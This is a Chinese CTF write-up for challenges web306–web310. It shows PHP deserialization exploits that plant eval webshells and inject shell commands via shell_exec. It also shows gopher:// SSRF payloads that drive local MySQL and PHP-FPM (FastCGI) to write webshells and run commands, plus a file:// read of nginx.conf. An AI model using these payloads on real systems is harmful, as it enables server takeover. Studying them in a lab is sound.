web306

这和之前的完全不一样了

<?php
#error_reporting(0);
session_start();
require 'service.php';

$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$service=new service();

$user=$service->login($username,$userpwd);
if($user){
	setcookie('user',base64_encode(serialize($user)),time()+60);
	header("location:index.php");
}else{
	header("location:login.php");
}

?>

然后添加

cookie：
user=TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI1OiI8P3BocCBAZXZhbCgkX1BPU1RbMV0pOz8%2BIjt9fQ%3D%3D
这是hackbar发的
如果是bp的话可以直接发但是我不知道为啥我的bp突然发不了了，然后访问1.php进行rce

web307

我是终于找到了在一堆里面弄

public function  clearCache(){
		shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
	}

EXP

<?php
class config{
    public $cache_dir=';echo "<?php eval(\$_POST[1]);?>" > 1.php;';
    //这里的反斜杠转义$,因为shell中的$有特殊含义
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
?>

cookie:
service=TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NDI6IjtlY2hvICI8P3BocCBldmFsKFwkX1BPU1RbMV0pOz8+IiA+IDEucGhwOyI7fX0=

访问1.php再rce就行了，但是不知道为啥我今天做不出来，弄了好一会了

web308

用工具打ssrf
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%3b%29%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%36%2e%70%68%70%27%01%00%00%00%01

<?php 
class config{
    public $update_url="gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%3b%29%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%36%2e%70%68%70%27%01%00%00%00%01";
}
class dao{
    public $config;
    
    function __construct(){
        $this->config=new config();
    }
}

echo urlencode(base64_encode(serialize(new dao())));
?>

web309

加了密码，打FastCGI

<?php 
class config{
    public $update_url="gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27tac%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00";
}
class dao{
    public $config;
    
    function __construct(){
        $this->config=new config();
    }
}

echo urlencode(base64_encode(serialize(new dao())));
?>

这个index.php的填写是填写网站的默认文件所以自然是他，然后我们打通之后访问index.php拿flag因为index.php也使用了同样的方法

![994d4e7339c760ff.png)

web310

说的源码没变，这里我们写个EXP看配置文件ngnix.conf

<?php 
class config{
    public $update_url='file:///etc/nginx/nginx.conf';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();

    }
}
echo base64_encode(serialize(new dao()));
?>

TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyODoiZmlsZTovLy9ldGMvbmdpbngvbmdpbnguY29uZiI7fX0=

作者：OceanSec
链接：https://juejin.cn/post/7083293190022758407
来源：稀土掘金
著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

server {
        listen       4476;
        server_name  localhost;
        root         /var/flag;
        index index.html;
}

# 每一个http块都可以包含多个server块，而每个server块就相当于一台虚拟主机，它内部可有多台主机联合提供服务，一起对外提供在逻辑上关系密切的一组服务

<?php
class config{
    public $update_url='http://127.0.0.1:4476';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
?>

正常是能看到回显的
这些题都要在index.php发包才可以